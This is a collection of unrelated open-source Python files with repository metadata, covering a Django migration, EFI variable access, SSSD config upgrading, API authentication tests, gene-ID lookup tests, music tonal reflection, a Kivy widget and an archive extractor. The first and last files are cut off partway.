"""Returns current file interpreter line"""
return inspect.getouterframes(inspect.currentframe())[1][2]
def __FILE__():
"""Returns c
|
urrent file interpreter line"""
return inspect.currentframe().f_code.co_filename
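# Illustrative usage (not part of the original module): __DEBUG__ prints only
# when its level is at most OPTIONS.debug_level.
#
#   __DEBUG__('token consumed', level=2)
#   print('%s:%i' % (__FILE__(), __LINE__()))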
|
hackultura/procult
|
procult/core/migrations/0004_auto_20160905_0938.py
|
Python
|
gpl-2.0
| 1,233 | 0.001622 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def port_models(apps, schema_editor):
Proposal = apps.get_model('core', 'Proposal')
Notice = apps.get_model('core', 'Notice')
n = Notice()
n.title = "Edital"
n.description = "Edital info"
n.save()
for p in Proposal.objects.all():
p.notice = n
p.save()
def reverse_port_models(apps, schema_editor):
    pass
class Migration(migrations.Migration):
dependencies = [
('core', '0003_proposaldate'),
]
operations = [
        migrations.CreateModel(
name='Notice',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('title', models.CharField(max_length=60)),
('description', models.CharField(max_length=500)),
('is_available', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='proposal',
name='notice',
field=models.ForeignKey(related_name='proposals', to='core.Notice', null=True),
),
migrations.RunPython(port_models, reverse_port_models),
]
|
aroth-arsoft/arsoft-python
|
python3/arsoft/efi/__init__.py
|
Python
|
gpl-3.0
| 4,063 | 0.006153 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
"""This module provides a general interface to EFI variables using platform-
specific methods. Currently Windows and Linux (with sysfs and efivars) are
supported.
Under Windows the pywin32 extensions are required.
"""
import os.path
import platform
import re
if platform.system() == 'Windows':
import ctypes
import win32api, win32process, win32security
class EfiVariables(object):
"""Abstract EFI variable access class.
Use get_instance to create an instance for the current operating system."""
def read(self, name, guid):
raise NotImplementedError
def write(self, name, guid, value):
raise NotImplementedError
@classmethod
def get_instance(cls):
if platform.system() == 'Windows':
return WinApiEfiVariables()
elif platform.system() == 'Linux':
return SysfsEfiVariables()
else:
raise Exception("Unknown or unsupported operating system.")
class SysfsEfiVariables(EfiVariables):
"""EFI variable access for all platforms supporting /sys/firmware/efi/vars, e.g. Linux via efi_vars"""
sysfs_efi_vars_dir = '/sys/firmware/efi/vars'
@staticmethod
def read_efi_value(fname):
ret = None
try:
with open(fname, 'rb') as f:
ret = f.read()
except (IOError, OSError):
pass
return ret
def read(self, name, guid):
assert re.match(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", guid)
filename = self.sysfs_efi_vars_dir + "/%s-%s/data" % (name, guid)
if not os.path.exists(filename):
# variable not found
return None
        return SysfsEfiVariables.read_efi_value(filename)
def available(self):
return os.path.isdir(self.sysfs_efi_vars_dir)
def __iter__(self):
if os.path.isdir(self.sysfs_efi_vars_dir):
for filename in os.listdir(self.sysfs_efi_vars_dir):
if filename == '.' or filename == '..':
continue
else:
if os.path.isdir(self.sysfs_efi_vars_dir + '/' + filename):
yield filename
else:
            return
def __getitem__(self, key):
filename = self.sysfs_efi_vars_dir + "/%s/data" % key
if not os.path.exists(filename):
# variable not found
return None
return SysfsEfiVariables.read_efi_value(filename)
class WinApiEfiVariables(EfiVariables):
"""EFI variable access for Windows platforms"""
def __init__(self):
# enable required SeSystemEnvironmentPrivilege privilege
privilege = win32security.LookupPrivilegeValue(None, 'SeSystemEnvironmentPrivilege')
token = win32security.OpenProcessToken(win32process.GetCurrentProcess(), win32security.TOKEN_READ|win32security.TOKEN_ADJUST_PRIVILEGES)
win32security.AdjustTokenPrivileges(token, False, [(privilege, win32security.SE_PRIVILEGE_ENABLED)])
win32api.CloseHandle(token)
# import firmware variable API
self.GetFirmwareEnvironmentVariable = ctypes.windll.kernel32.GetFirmwareEnvironmentVariableW
self.GetFirmwareEnvironmentVariable.restype = ctypes.c_int
self.GetFirmwareEnvironmentVariable.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_void_p, ctypes.c_int]
def read(self, name, guid):
buffer = ctypes.create_string_buffer(32768)
length = self.GetFirmwareEnvironmentVariable(name, "{%s}" % guid, buffer, 32768)
if length == 0:
# FIXME: don't always raise WinError
raise ctypes.WinError()
return buffer[:length]
def available(self):
return True if self.GetFirmwareEnvironmentVariable is not None else False
    def __iter__(self):
        # variable enumeration is not implemented on Windows
        return iter([])
def __getitem__(self, key):
return None
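# Illustrative usage sketch (not part of the original module); the GUID below
# is the standard EFI global-variable namespace.
if __name__ == '__main__':
    efi_vars = EfiVariables.get_instance()
    if efi_vars.available():
        print(efi_vars.read('BootOrder', '8be4df61-93ca-11d2-aa0d-00e098032b8c'))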
|
spbnick/sssd
|
src/config/SSSDConfig/sssd_upgrade_config.py
|
Python
|
gpl-3.0
| 18,663 | 0.008359 |
#coding=utf-8
# SSSD
#
# upgrade_config.py
#
# Copyright (C) Jakub Hrozek <jhrozek@redhat.com> 2009
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
import os
import sys
import shutil
import traceback
from optparse import OptionParser
from .ipachangeconf import openLocked
from .ipachangeconf import SSSDChangeConf
class SSSDConfigFile(SSSDChangeConf):
def __init__(self, filename):
SSSDChangeConf.__init__(self)
self.filename = filename
f = openLocked(self.filename, 0o600, False)
self.opts = self.parse(f)
f.close()
def _backup_file(self, file_name):
" Copy the file we operate on to a backup location "
shutil.copy(file_name, file_name + self.backup_suffix)
# make sure we don't leak data, force permissions on the backup
os.chmod(file_name + self.backup_suffix, 0o600)
def get_version(self):
ver = self.get_option_index('sssd', 'config_file_version')[1]
if not ver:
return 1
try:
return int(ver['value'])
except ValueError:
raise SyntaxError('config_file_version not an integer')
def rename_opts(self, parent_name, rename_kw, type='option'):
for new_name, old_name in rename_kw.items():
index, item = self.get_option_index(parent_name, old_name, type)
if item:
item['name'] = new_name
def _add_dns_domain_name(self, domain):
id_provider = self.findOpts(domain['value'], 'option', 'id_provider')[1]
dns_domain_name = { 'type' : 'option',
'name' : 'dns_discovery_domain',
                            # take the part after the 'domain/' prefix
                            'value' : domain['name'][len('domain/'):] }
if id_provider['value'] == 'ldap':
server = self.findOpts(domain['value'], 'option', 'ldap_uri')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
return
elif id_provider['value'] == 'ipa':
server = self.findOpts(domain['value'], 'option', 'ipa_server')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
return
auth_provider = self.findOpts(domain['value'], 'option', 'auth_provider')[1]
if auth_provider and auth_provider['value'] == 'krb5':
server = self.findOpts(domain['value'], 'option', 'krb5_server')[1]
if not server or "__srv__" in server['value']:
domain['value'].insert(0, dns_domain_name)
def _do_v2_changes(self):
# remove Data Provider
srvlist = self.get_option_index('sssd', 'services')[1]
if srvlist:
services = [ srv.strip() for srv in srvlist['value'].split(',') ]
if 'dp' in services:
services.remove('dp')
srvlist['value'] = ", ".join([srv for srv in services])
self.delete_option('section', 'dp')
for domain in [ s for s in self.sections() if s['name'].startswith("domain/") ]:
# remove magic_private_groups from all domains
self.delete_option_subtree(domain['value'], 'option', 'magic_private_groups')
# check if we need to add dns_domain
self._add_dns_domain_name(domain)
def _update_option(self, to_section_name, from_section_name, opts):
to_section = [ s for s in self.sections() if s['name'].strip() == to_section_name ]
from_section = [ s for s in self.sections() if s['name'].strip() == from_section_name ]
if len(to_section) > 0 and len(from_section) > 0:
vals = to_section[0]['value']
for o in [one_opt for one_opt in from_section[0]['value'] if one_opt['name'] in opts]:
updated = False
for v in vals:
if v['type'] == 'empty':
continue
# if already in list, just update
if o['name'] == v['name']:
o['value'] = v['value']
updated = True
# not in list, add there
if not updated:
vals.insert(0, { 'name' : o['name'], 'type' : o['type'], 'value' : o['value'] })
def _migrate_enumerate(self, domain):
" Enumerate was special as it turned into bool from (0,1,2,3) enum "
enum = self.findOpts(domain, 'option', 'enumerate')[1]
if enum:
if enum['value'].upper() not in ['TRUE', 'FALSE']:
try:
enum['value'] = int(enum['value'])
except ValueError:
raise ValueError('Cannot convert value %s in domain %s' % (enum['value'], domain['name']))
if enum['value'] == 0:
enum['value'] = 'FALSE'
elif enum['value'] > 0:
enum['value'] = 'TRUE'
else:
raise ValueError('Cannot convert value %s in domain %s' % (enum['value'], domain['name']))
def _migrate_domain(self, domain):
# rename the section
domain['name'] = domain['name'].strip().replace('domains', 'domain')
# Generic options - new:old
generic_kw = { 'min_id' : 'minId',
'max_id': 'maxId',
'timeout': 'timeout',
'magic_private_groups' : 'magicPrivateGroups',
'cache_credentials' : 'cache-credentials',
'id_provider' : 'provider',
'auth_provider' : 'auth-module',
'access_provider' : 'access-module',
'chpass_provider' : 'chpass-module',
'use_fully_qualified_names' : 'useFullyQualifiedNames',
'store_legacy_passwords' : 'store-legacy-passwords',
}
# Proxy options
proxy_kw = { 'proxy_pam_target' : 'pam-target',
'proxy_lib_name' : 'libName',
}
# LDAP options - new:old
ldap_kw = { 'ldap_uri' : 'ldapUri',
'ldap_schema' : 'ldapSchema',
'ldap_default_bind_dn' : 'defaultBindDn',
'ldap_default_authtok_type' : 'defaultAuthtokType',
'ldap_default_authtok' : 'defaultAuthtok',
'ldap_user_search_base' : 'userSearchBase',
'ldap_user_search_scope' : 'userSearchScope',
'ldap_user_search_filter' : 'userSearchFilter',
'ldap_user_object_class' : 'userObjectClass',
'ldap_user_name' : 'userName',
'ldap_user_pwd' : 'userPassword',
'ldap_user_uid_number' : 'userUidNumber',
'ldap_user_gid_number' : 'userGidNumber',
'ldap_user_gecos' : 'userGecos',
'ldap_user_home_directory' : 'userHomeDirectory',
'ldap_user_shell' : 'userShell',
'ldap_user_uuid' : 'userUUID',
'ldap_user_principal' : 'userPrincipal',
'ldap_force_upper_case_realm' : 'force_upper_case_realm',
'ldap_user_fullname' : 'userFullname',
'ldap_user_member_of' : 'userMemberOf',
'ldap_user_modify_timestamp' : 'modifyTimestamp',
'ldap_group_search_base' : 'groupSearchBase',
|
lrocheWB/navitia
|
source/jormungandr/tests/authentication_tests.py
|
Python
|
agpl-3.0
| 17,792 | 0.003147 |
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import logging
from navitiacommon import models
from .tests_mechanism import AbstractTestFixture, dataset
from .check_utils import *
from contextlib import contextmanager
from flask import appcontext_pushed, g
from jormungandr import app
import json
import logging
from nose.util import *
authorizations = {
'bob': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'bobette': {
#bobette cannot access anything
"main_routing_test": {'ALL': False},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'bobitto': {
#bobitto can access all since empty_routing_test is free
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': False}
},
'tgv': {
#tgv can only access main_routing_test
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': False},
"empty_routing_test": {'ALL': False}
},
'test_user_blocked': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': True}
},
'test_user_not_blocked': {
"main_routing_test": {'ALL': True},
"departure_board_test": {'ALL': True},
"empty_routing_test": {'ALL': True}
},
}
class FakeUser:
"""
We create a user independent from a database
"""
def __init__(self, name, id, have_access_to_free_instances=True, is_super_user=False, is_blocked=False):
"""
We just need a fake user, we don't really care about its identity
"""
self.id = id
self.login = name
self.have_access_to_free_instances = have_access_to_free_instances
self.is_super_user = is_super_user
self.end_point_id = None
self._is_blocked = is_blocked
@classmethod
def get_from_token(cls, token):
"""
Create an empty user
"""
return user_in_db[token]
def has_access(self, instance_name, api_name):
"""
        This is made to avoid using the database
"""
return authorizations[self.login][instance_name][api_name]
def is_blocked(self, datetime_utc):
"""
Return True if user is blocked else False
"""
return self._is_blocked
class FakeInstance(models.Instance):
def __init__(self, name, is_free):
self.name = name
self.is_free = is_free
self.id = name
@classmethod
def get_by_name(cls, name):
return mock_instances.get(name)
user_in_db = {
'bob': FakeUser('bob', 1),
'bobette': FakeUser('bobette', 2),
'bobitto': FakeUser('bobitto', 3),
'tgv': FakeUser('tgv', 4, have_access_to_free_instances=False),
'test_user_blocked': FakeUser('test_user_blocked', 5, True, False, True),
'test_user_not_blocked': FakeUser('test_user_not_blocked', 6, True, False, False)
}
mock_instances = {
'main_routing_test': FakeInstance('main_routing_test', False),
'departure_board_test': FakeInstance('departure_board_test', False),
'empty_routing_test': FakeInstance('empty_routing_test', True),
}
@contextmanager
def user_set(app, user_name):
"""
add user
"""
def handler(sender, **kwargs):
g.user = FakeUser.get_from_token(user_name)
with appcontext_pushed.connected_to(handler, app):
yield
class AbstractTestAuthentication(AbstractTestFixture):
def setUp(self):
self.old_public_val = app.config['PUBLIC']
app.config['PUBLIC'] = False
self.app = app.test_client()
self.old_instance_getter = models.Instance.get_by_name
models.Instance.get_by_name = FakeInstance.get_by_name
def tearDown(self):
app.config['PUBLIC'] = self.old_public_val
models.Instance.get_by_name = self.old_instance_getter
@dataset({"main_routing_test": {}, "departure_board_test": {}})
class TestBasicAuthentication(AbstractTestAuthentication):
def test_coverage(self):
"""
User only has access to the first region
"""
with user_set(app, 'bob'):
response_obj = self.app.get('/v1/coverage')
response = json.loads(response_obj.data)
assert('regions' in response)
assert(len(response['regions']) == 1)
assert(response['regions'][0]['id'] == "main_routing_test")
def test_auth_required(self):
"""
        if no token is given we are asked to log in (code 401) and a challenge is sent (header WWW-Authenticate)
"""
response_obj = self.app.get('/v1/coverage')
assert response_obj.status_code == 401
assert 'WWW-Authenticate' in response_obj.headers
def test_status_code(self):
"""
        We query the api with user 1 who has access to the main routing test and not to the departure board
"""
requests_status_codes = [
('/v1/coverage/main_routing_test', 200),
('/v1/coverage/departure_board_test', 403),
# stopA and stopB and in main routing test, all is ok
('/v1/journeys?from=stopA&to=stopB&datetime=20120614T080000', 200),
            # stop2 is in departure board -> KO
('/v1/journeys?from=stopA&to=stop2&datetime=20120614T080000', 403),
# stop1 and stop2 are in departure board -> KO
('/v1/journeys?from=stop1&to=stop2&datetime=20120614T080000', 403)
]
with user_set(app, 'bob'):
for request, status_code in requests_status_codes:
assert(self.app.get(request).status_code == status_code)
def test_unkown_region(self):
"""
        the authentication process must not interfere when the region is not found
"""
with user_set(app, 'bob'):
r, status = self.query_no_assert('/v1/coverage/the_marvelous_unknown_region/stop_areas')
assert status == 404
assert 'error' in r
assert get_not_null(r, 'error')['message'] \
== "The region the_marvelous_unknown_region doesn't exists"
@dataset({"main_routing_test": {}})
class TestIfUserIsBlocked(AbstractTestAuthentication):
def test_status_code(self):
"""
We query the api with user 5 who must be blocked
"""
requests_status_codes = [
('/v1/coverage/main_routing_test', 429),
('/v1/coverage/departure_board_test', 429)
]
with user_set(app, 'test_user_blocked'):
for request, status_code in requests_status_codes:
assert(self.app.get(request).status_code == status_code)
@dataset({"main_routing_test": {}})
class TestIfUserIsNotBlocked(AbstractTestAuthentication):
def test_status_code(self):
|
sorgerlab/belpy
|
indra/tests/test_hgnc_client.py
|
Python
|
mit
| 2,834 | 0 |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.databases import hgnc_client
from indra.util import unicode_strs
from nose.plugins.attrib import attr
def test_get_uniprot_id():
hgnc_id = '6840'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id == 'Q02750'
assert unicode_strs(uniprot_id)
def test_get_uniprot_id_none():
# This HGNC entry doesn't have a UniProt ID
hgnc_id = '37187'
uniprot_id = hgnc_client.get_uniprot_id(hgnc_id)
assert uniprot_id is None, uniprot_id
def test_get_hgnc_name():
hgnc_id = '3236'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name == 'EGFR'
assert unicode_strs(hgnc_name)
@attr('webservice')
def test_get_hgnc_name_nonexistent():
hgnc_id = '123456'
hgnc_name = hgnc_client.get_hgnc_name(hgnc_id)
assert hgnc_name is None
    assert unicode_strs(hgnc_name)
def test_entrez_hgnc():
entrez_id = '653509'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id == '10798'
def test_entrez_hgnc_none():
entrez_id = 'xxx'
hgnc_id = hgnc_client.get_hgnc_from_entrez(entrez_id)
assert hgnc_id is None
def test_ensembl_hgnc():
ensembl_id = 'ENSG00000006071'
hgnc_id = hgnc_client.get_hgnc_from_ensembl(ensembl_id)
    assert hgnc_id == '59', hgnc_id
assert hgnc_client.get_ensembl_id(hgnc_id) == ensembl_id
def test_mouse_map():
hgnc_id1 = hgnc_client.get_hgnc_from_mouse('109599')
hgnc_id2 = hgnc_client.get_hgnc_from_mouse('MGI:109599')
assert hgnc_id1 == '4820'
assert hgnc_id2 == '4820'
hgnc_id = hgnc_client.get_hgnc_from_mouse('xxx')
assert hgnc_id is None
def test_rat_map():
hgnc_id1 = hgnc_client.get_hgnc_from_rat('6496784')
hgnc_id2 = hgnc_client.get_hgnc_from_rat('RGD:6496784')
assert hgnc_id1 == '44155'
assert hgnc_id2 == '44155'
hgnc_id = hgnc_client.get_hgnc_from_rat('xxx')
assert hgnc_id is None
def test_is_category():
assert hgnc_client.is_kinase('MAPK1')
assert not hgnc_client.is_kinase('EGF')
assert hgnc_client.is_phosphatase('PTEN')
assert not hgnc_client.is_phosphatase('KRAS')
assert hgnc_client.is_transcription_factor('FOXO3')
assert not hgnc_client.is_transcription_factor('AKT1')
def test_get_current_id():
# Current symbol
assert hgnc_client.get_current_hgnc_id('BRAF') == '1097'
# Outdated symbol, one ID
assert hgnc_client.get_current_hgnc_id('SEPT7') == '1717'
# Outdated symbol, multiple IDs
ids = hgnc_client.get_current_hgnc_id('HOX1')
assert len(ids) == 10
assert '5101' in ids
def test_gene_type():
assert hgnc_client.get_gene_type('1097') == 'gene with protein product'
assert hgnc_client.get_gene_type('31547') == 'RNA, micro'
|
dpazel/music_rep
|
transformation/functions/tonalfunctions/chromatic_tonal_reflection_function.py
|
Python
|
mit
| 8,810 | 0.003973 |
"""
File: chromatic_tonal_reflection_function.py
Purpose: Class defining a function that tonally reflects over a given tone.
"""
from tonalmodel.diatonic_foundation import DiatonicFoundation
from tonalmodel.tonality import Tonality
from transformation.functions.pitchfunctions.diatonic_pitch_reflection_function import FlipType
from transformation.functions.tonalfunctions.tonal_function import TonalFunction
from tonalmodel.interval import Interval
class ChromaticTonalReflectionFunction(TonalFunction):
def __init__(self, domain_tonality, cue_tone, reflect_type=FlipType.CenterTone):
"""
Constructor
:param domain_tonality: Scalar tonality being reflected
:param cue_tone: Cue tone for reflection (must be in domain tonality).
:param reflect_type: See FlipType for types of reflection.
"""
self.__domain_tonality = domain_tonality
self.__cue_tone = cue_tone
self.__reflect_type = reflect_type
if cue_tone not in domain_tonality.annotation:
raise Exception('Cue tone {0} is not in tonality {1}.'.format(cue_tone.diatonic_symbol, domain_tonality))
self.__primary_map, tonality_list = self._build_primary_map()
if len(tonality_list) == 0:
            raise Exception('Tonal reflection on {0} cue {1} could not resolve range tonality.'.format(
self.domain_tonality, self.cue_tone))
        # We likely should do some kind of matching of domain to range, e.g. minor-type --> minor-type.
# TODO: Explore how to improve this setting when tonality_list has more than 1 element.
self.__range_tonality = tonality_list[0]
TonalFunction.__init__(self, self.domain_tonality, self.range_tonality, self.tonal_map,
self._build_extension_map())
@property
def cue_tone(self):
return self.__cue_tone
@property
def reflect_type(self):
return self.__reflect_type
@property
def tonal_map(self):
return self.__primary_map
@property
def domain_tonality(self):
return self.__domain_tonality
@property
def range_tonality(self):
return self.__range_tonality
def _build_primary_map(self):
domain_scale = self.domain_tonality.annotation[:-1]
tonal_map = dict()
if self.reflect_type == FlipType.CenterTone:
for tone in domain_scale:
interval = Interval.calculate_tone_interval(tone, self.cue_tone)
end_tone = interval.get_end_tone(self.cue_tone)
tonal_map[tone] = end_tone
else:
if self.reflect_type == FlipType.LowerNeighborOfPair:
lower_index = domain_scale.index(self.cue_tone)
upper_index = (lower_index + 1) % len(domain_scale)
else:
upper_index = domain_scale.index(self.cue_tone)
lower_index = (upper_index - 1) % len(domain_scale)
tonal_map[domain_scale[upper_index]] = domain_scale[lower_index]
tonal_map[domain_scale[lower_index]] = domain_scale[upper_index]
last_lower = domain_scale[lower_index]
last_upper = domain_scale[upper_index]
for i in list(reversed(range(0, lower_index))):
new_lower = domain_scale[i]
interval = Interval.calculate_tone_interval(new_lower, last_lower)
new_upper = interval.get_end_tone(last_upper)
tonal_map[new_lower] = new_upper
last_lower = new_lower
last_upper = new_upper
last_lower = domain_scale[lower_index]
last_upper = domain_scale[upper_index]
for i in list(range((upper_index + 1), len(domain_scale))):
new_upper = domain_scale[i]
interval = Interval.calculate_tone_interval(last_upper, new_upper)
new_lower = interval.negation().get_end_tone(last_lower)
tonal_map[new_upper] = new_lower
last_lower = new_lower
last_upper = new_upper
range_tones = list(reversed([tonal_map[tone] for tone in domain_scale]))
first_tone = range_tones[-1]
range_tones = [first_tone] + range_tones[:-1]
# Determine the tonality of the range
range_tonality = Tonality.find_tonality(range_tones)
return tonal_map, range_tonality
def _build_extension_map(self):
ltrs = 'CDEFGAB'
extension = dict()
domain_scale = self.domain_tonality.annotation[:-1]
domain_start_index = ltrs.index(domain_scale[0].diatonic_letter)
domain_index_list = list(ltrs[domain_start_index:] + ltrs[:domain_start_index])
# One time calculations based on lower upper
if self.reflect_type != FlipType.CenterTone:
if self.reflect_type == FlipType.LowerNeighborOfPair:
lower_domain_index = domain_scale.index(self.cue_tone)
upper_domain_index = (lower_domain_index + 1) % len(domain_scale)
else:
upper_domain_index = domain_scale.index(self.cue_tone)
lower_domain_index = (upper_domain_index - 1) % len(domain_scale)
lower_tone = domain_scale[lower_domain_index]
upper_tone = domain_scale[upper_domain_index]
lower_ltr_index = domain_index_list.index(lower_tone.diatonic_letter)
lower_augmentation = lower_tone.augmentation_offset
upper_ltr_index = domain_index_list.index(upper_tone.diatonic_letter)
upper_augmentation = upper_tone.augmentation_offset
else:
lower_tone = None
upper_tone = None
lower_ltr_index = None
lower_augmentation = None
upper_ltr_index = None
            upper_augmentation = None
for l in 'CDEFGAB':
for aug in ['bb', 'b', '', '#', "##"]:
tone = DiatonicFoundation.get_tone(l + aug)
if tone not in self.tonal_map.keys():
if self.reflect_type == FlipType.CenterTone:
interval = Interval.calculate_tone_interval(tone, self.cue_tone)
if interval: # Some intervals are illegal, eg Cbb --> C, for now ignore
end_tone = interval.get_end_tone(self.cue_tone)
extension[tone] = end_tone
else:
tone_ltr_index = domain_index_list.index(tone.diatonic_letter)
tone_augmentation = tone.augmentation_offset
if tone_ltr_index >= 0 and (tone_ltr_index < lower_ltr_index or
(tone_ltr_index == lower_ltr_index and
tone_augmentation <= lower_augmentation)):
interval = Interval.calculate_tone_interval(tone, lower_tone)
if interval:
upper = interval.get_end_tone(upper_tone)
extension[tone] = upper
elif tone_ltr_index < len(domain_index_list) and (tone_ltr_index > upper_ltr_index or
(tone_ltr_index == upper_ltr_index and
tone_augmentation >= upper_augmentation)):
interval = Interval.calculate_tone_interval(tone, upper_tone)
if interval:
new_lower = interval.get_end_tone(lower_tone)
extension[tone] = new_lower
else: # Between the two limits
upper_interval = Interval.calculate_tone_interval(tone, upper_tone)
lower_interval = Interval.calculate_tone_interval(lower_tone, tone)
if upper_interval is None and lower_interval is None:
continue
eli
|
insiderr/insiderr-app
|
app/widgets/bar.py
|
Python
|
gpl-3.0
| 1,558 | 0.000642 |
from kivy.uix.label import Label
from kivy.uix.behaviors import ButtonBehavior
from widgets.layoutint import GridLayoutInt
from kivy.uix.image import Image
from kivy.properties import StringProperty, ListProperty, ObjectProperty, NumericProperty, BooleanProperty
from kivy.compat import string_types
from kivy.factory import Factory
class BarMiddleLabel(Label):
pass
class BarMiddleImage(Image):
pass
class BarMiddleButton(ButtonBehavior, GridLayoutInt):
title = StringProperty()
class Bar(GridLayoutInt):
__events__ = ('on_left_click', 'on_right_click')
screen = ObjectProperty()
color = ListProperty([1, 1, 1, 1])
left_icon = StringProperty('')
right_icon = StringProperty('')
hide_right_icon = BooleanProperty(False)
middle_cls = ObjectProperty(None, allownone=True)
middle = ObjectProperty()
shadow_height = NumericProperty(0)
def __init__(self, **kwargs):
super(Bar, self).__init__(**kwargs)
self._resolve_middle_cls()
self.bind(middle_cls=self._resolve_middle_cls)
def _resolve_middle_cls(self, *args):
if not self.middle_cls:
return
if self.middle:
self.remove_widget(self.middle)
middle_cls = self.middle_cls
if isinstance(middle_cls, string_types):
middle_cls = Factory.get(middle_cls)
self.middle = middle_cls(screen=self.screen)
self.add_widget(self.middle, 1)
def on_left_click(self, button_box):
pass
def on_right_click(self, button_box):
pass
|
Grumbel/dirtool
|
dirtools/extractor.py
|
Python
|
gpl-3.0
| 2,353 | 0.000425 |
# dirtool.py - diff tool for directories
# Copyright (C) 2018 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import QObject
from abc import abstractmethod
class ExtractorResult:
SUCCESS = 0
FAILURE = 1
WORKING = 2
@staticmethod
def success(message: str = "") -> 'ExtractorResult':
return ExtractorResult(ExtractorResult.SUCCESS, message)
@staticmethod
def failure(message: str) -> 'ExtractorResult':
return ExtractorResult(ExtractorResult.FAILURE, message)
def __init__(self, status: int, message: str = "") -> None:
self.status = status
self.message = message
def __str__(self) -> str:
return "ExtractorResult({}, \"{}\")".format(self.status, self.message)
class Extractor(QObject):
def __init__(self) -> None:
super().__init__()
@property
@abstractmethod
def sig_entry_extracted(self):
pass
@property
@abstractmethod
def sig_finished(self):
pass
@abstractmethod
def extract(self) -> ExtractorResult:
pass
    def interrupt(self) -> None:
pass
def make_extractor(filename: str, outdir: str) -> Extractor:
from dirtools.rar_extractor import RarExtractor
from dirtools.sevenzip_extractor import SevenZipExtractor
from dirtools.libarchive_extractor import LibArchiveExtractor
# FIXME: Use mime-type to decide proper extractor
if filename.lower().endswith(".rar"):
extractor = RarExtractor(filename, outdir)
elif True: # pylint: disable=using-constant-test
extractor = SevenZipExtractor(filename, outdir)
else:
extractor = LibArchiveExtractor(filename, outdir)
return extractor
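# Illustrative usage (not part of the original file):
#
#   extractor = make_extractor('photos.rar', '/tmp/out')
#   result = extractor.extract()
#   if result.status == ExtractorResult.FAILURE:
#       print(result.message)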
# EOF #
|
selaux/numpy2vtk
|
numpy2vtk/data/raw/__init__.py
|
Python
|
lgpl-3.0
| 150 | 0 |
from raw import points
from raw import vertices
from raw import edges
from raw import polygons
__all__ = ['points', 'vertices', 'edges', 'polygons']
|
bockthom/codeface
|
codeface/fileCommit.py
|
Python
|
gpl-2.0
| 7,096 | 0.002114 |
# This file is part of Codeface. Codeface is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Copyright 2013, Siemens AG, Mitchell Joblin <mitchell.joblin.ext@siemens.com>
# All Rights Reserved.
'''This class is a container to represent a commit's relationship to the
other commits present in a particular file at the time of the commit.
The analysis is performed on a file by file basis. A commit can touch multiple
files however this class considers a given commit only in the context of a
single file.'''
import commit
import bisect
class FileDict:
"""
A generic dictionary for saving per-line information.
We assume that this information is available on any line,
and that the information only changes on some lines.
So we only save the information on lines that change that info
and use bisect to retrieve that information (for any line).
"""
    def __init__(self, line_list=None, line_dict=None):
        """
        Create a FileDict, optionally seeded with existing line data.
        :rtype : FileDict
        """
        if line_list is None:
            line_list = []
        if line_dict is None:
            line_dict = {}
        self.line_list = line_list
        self.line_dict = line_dict
        self.lastItem = line_list[-1] if line_list else -1
def __iter__(self):
return self.line_dict.__iter__()
def get_line_info_raw(self, line_nr):
"""
Returns the info for the given line
